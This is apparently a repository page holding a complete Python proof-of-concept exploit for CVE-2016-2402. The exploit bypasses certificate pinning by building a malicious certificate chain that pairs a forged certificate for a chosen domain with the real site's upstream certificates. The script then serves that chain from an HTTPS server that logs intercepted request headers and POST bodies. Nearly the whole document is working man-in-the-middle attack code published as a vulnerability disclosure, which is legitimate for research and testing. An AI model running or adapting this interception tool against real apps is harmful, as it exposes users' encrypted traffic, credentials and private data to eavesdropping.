4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cert-pinning-flaw-poc.py PY
#!/usr/bin/python3
# John Kozyrakis

import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl
import argparse
import logging
import os
import sys
from OpenSSL import crypto, SSL
import socket

class ServerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        logging.debug("intercepted GET request. If you see data from the client here, the attack worked.")
        self.log_request()
        logging.debug(self.headers)

    def do_POST(self):
        logging.debug("")
        logging.debug(
            "intercepted POST request to %s. If you see data from the client here, the attack worked." % self.path)
        self.log_request()
        if "tracking" not in self.path:
            logging.debug(self.headers)
            length = int(self.headers['Content-Length'])
            content = self.rfile.read(length)
            logging.debug(content)


def gen_malicious_chain(domain):
    # load CA certificate and key
    trusted_ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM,
                                              open(os.path.join(os.path.dirname(__file__), CA_CERT)).read())
    trusted_ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM,
                                            open(os.path.join(os.path.dirname(__file__), CA_KEY)).read())

    # generate a new end-entity certificate for a given domain signed by our trusted CA
    [(end_entity_cert, end_entity_key)] = generate_end_entity_cert(domain, trusted_ca_cert, trusted_ca_key)
    tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, end_entity_cert))
    tempMaliciousChainFile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, end_entity_key))

    logging.debug("Generated end-entity cert & key, signed by the provided CA. Adding these to the malicious chain")

    upstream_certs = get_upstream_certs(domain, 443)

    logging.info("Retrieved the certificates used by the real %s (%s in total)" % (domain, len(upstream_certs)))

    if args.mode == 'attack':
        for cert in upstream_certs:
            tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        logging.info("The upstream certificates WILL be added to the malicious client chain")
    else:
        logging.info("The upstream certificates will NOT be added to the malicious client chain")


def generate_end_entity_cert(domain, cacert, cakey):
    skey = crypto.PKey()
    skey.generate_key(crypto.TYPE_RSA, 2048)
    scert = crypto.X509()
    scert.get_subject().CN = domain  # This is where the domain fits
    scert.set_issuer(cacert.get_subject())
    scert.gmtime_adj_notBefore(0)
    scert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
    scert.set_serial_number(0)
    scert.set_pubkey(skey)
    scert.sign(cakey, "sha1")
    return [(scert, skey)]


def get_upstream_certs(host, port):
    context = SSL.Context(SSL.SSLv23_METHOD)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection = SSL.Connection(context, s)
    connection.connect((host, port))
    try:
        connection.do_handshake()
    except SSL.WantReadError:
        logging.error("Timeout")
        cleanup()
    return connection.get_peer_cert_chain()


def cleanup():
    tempMaliciousChainFile.close()
    logging.error("Exiting")
    sys.exit(1)


logging.basicConfig(level=logging.DEBUG)
logging.info("Certificate Pinning bypass POC - CVE-2016-2402 - https://koz.io/pinning-cve-2016-2402")

parser = argparse.ArgumentParser(
    prog='Certificate Pinning bypass POC',
    description='''This utility will set up a HTTPS server that uses a malicious certificate chain for a specific domain.
     If traffic of a vulnerable app is redirected to this server, certificate pinning for that domain will bypassed.
     See https://koz.io/pinning-cve-2016-2402 for more details.''',
    epilog='''@ikoz - John Kozyrakis''')

parser.add_argument("-d", "--domain", help="Domain name to be intercepted", required=True)
parser.add_argument("-p", "--port", help="Web server port number", type=int, default=443)
parser.add_argument("-c", "--cacert", help="CA certificate that the host system trusts (PEM)", default="CA_CERT.pem")
parser.add_argument("-k", "--cakey", help="Private key of CA that the host system trusts (PEM)", default="CA_KEY.pem")
parser.add_argument("-m", "--mode", help="Add upstream certificates to chain (or not)",
                    choices=['attack', 'no-attack'], required=True)
parser.add_argument("-v", "--verbose", help="increase output verbosity",
                    action="store_true")
args = parser.parse_args()

logging.info("Will intercept domain %s" % args.domain)
logging.info("Will use CA certificate %s with private key %s" % (args.cacert, args.cakey))

CA_CERT = args.cacert  # certificate of CA that the host system trusts
CA_KEY = args.cakey  # private key of CA that the host system trusts

if os.path.isfile(CA_CERT) is False:
    logging.error("CA_CERT %s is not a valid file" % CA_CERT)
    cleanup()
if os.path.isfile(CA_KEY) is False:
    logging.error("CA_KEY %s is not a valid file" % CA_KEY)
    cleanup()

tempMaliciousChainFile = tempfile.NamedTemporaryFile()

gen_malicious_chain(args.domain)

logging.info(
    "Starting web server - listening at port %s. Redirecting traffic for %s to this server will bypass any pinning and "
    "show the requests here" % (
        args.port, args.domain))
logging.info("Use Ctrl+C to stop the server")

try:
    httpd = HTTPServer(("localhost", args.port), ServerHandler)
except PermissionError:
    logging.error("PermissionError: Cannot start server on port %s. Please use sudo or a port >1024" % args.port)
    cleanup()
except:
    logging.exception("Exception")
    cleanup()

httpd.socket = ssl.wrap_socket(httpd.socket, certfile=tempMaliciousChainFile.name, server_side=True)
httpd.serve_forever()